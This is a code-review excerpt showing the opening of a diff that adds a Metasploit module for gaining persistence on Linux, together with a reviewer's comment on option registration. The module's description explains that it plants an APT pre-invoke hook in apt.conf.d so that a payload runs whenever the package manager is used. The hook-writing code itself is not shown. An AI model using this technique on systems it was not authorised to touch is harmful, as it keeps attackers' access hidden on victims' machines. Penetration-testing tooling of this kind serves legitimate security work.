modules/exploits/linux/local/apt_package_manager_persistence.rb

```diff
@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Post::Unix
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'APT Package Manager Persistence',
+      'Description'    => %q(
+        This module will run a payload when the package manager is triggered.  Module installs a pre-invoke hook for APT in apt.conf.d.  Hook name syntax is numeric followed by text. 
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Aaron Ringo' ],
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+      'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian
+      'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0  
+    ))
+
+    register_options(
+      [
+        OptString.new('HOOKNAME', [true, 'Name of shell file to write', '05new-hook' ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/usr/local/bin/' ]),
```

Comment:
`WritableDir` should be registered as an advanced option with `register_advanced_options`